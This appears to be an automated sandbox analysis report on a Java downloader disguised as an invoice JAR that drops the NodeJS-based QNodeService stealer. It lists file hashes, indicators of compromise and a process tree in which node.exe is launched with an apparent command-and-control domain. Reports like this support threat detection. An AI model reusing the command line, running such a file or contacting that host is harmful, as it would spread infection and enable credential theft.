qnodeservice | d7b3a26564a7d3232604da3dec930c10a3f777e5cbfc8d47a1ea8e55c6f2164d

Analysis

Target

380000_USD_INV_011740_NOV_2020.jar
Size

64KB
MD5

aa4cc34e07330dac5e26c7e48bc469fd
SHA1

8810ae3a071b894f76bbbd8bb8cec2832eee0362
SHA256

6d3f7620b05ce217ff5db72d4af251801a16b4c86b7a2caa79dbe4431c5e0289
SHA512

9f98db768d103b940d23ecaa92a750c567f19b3198cbbc16d50d8a0d7c858355e42fddcace4fd1ed7f8b9d5c72c334429cb0e7e8b832562b31c602a566898f20

Score

10^/10

QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
trojan qnodeservice

Executes dropped EXE 1 IoCs

pid	Process
184	node.exe

JavaScript code in executable 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001ab86-172.dat	js

Suspicious behavior: EnumeratesProcesses 4 IoCs

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 640 wrote to memory of 856	640	java.exe	76
PID 640 wrote to memory of 856	640	java.exe	76
PID 856 wrote to memory of 184	856	javaw.exe	80
PID 856 wrote to memory of 184	856	javaw.exe	80

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\380000_USD_INV_011740_NOV_2020.jar
1⤵
- Suspicious use of WriteProcessMemory
PID:640
- C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
  "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\2445b50e.tmp
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:856
- - C:\Users\Admin\node-v14.12.0-win-x64\node.exe
    C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain gatherlozx.hopto.org --hub-domain localhost
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:184

memory/184-173-0x0000011C7BDC0000-0x0000011C7BDC1000-memory.dmp

Filesize
4KB

Download